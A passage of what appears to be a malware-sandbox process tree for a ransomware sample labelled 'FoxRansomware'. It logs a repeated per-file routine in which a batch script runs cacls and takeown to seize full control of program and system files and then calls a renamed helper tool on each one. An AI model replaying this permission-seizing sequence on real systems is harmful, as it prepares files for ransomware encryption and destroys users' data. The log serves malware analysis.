    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:3272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3640
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:3732
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:3908
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:3944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:3576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:476
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:1292
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  PID:704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:3924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      PID:2460
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  PID:876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "email_all.gif" -nobanner
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "email_all.gif" -nobanner
      4⤵
      PID:3752
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  PID:3212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    PID:1268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      PID:2796
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    PID:860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:3120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:2772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:3216
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:3436
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:3164
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:3296
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:3452
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3360
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    PID:592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:708
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:4172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    - Modifies file permissions
    PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:4228
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:3320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:4120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:3624
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:4020
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:1260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:3700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:3688
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:3616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "background.png" -nobanner
    3⤵
    PID:3720
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3376
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:2136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:4192
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4204
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:4688
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:4392
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:4672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:4280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:4296
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:2540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:4348
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:4716
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    - Modifies file permissions
    PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:4496
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:4972
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4584
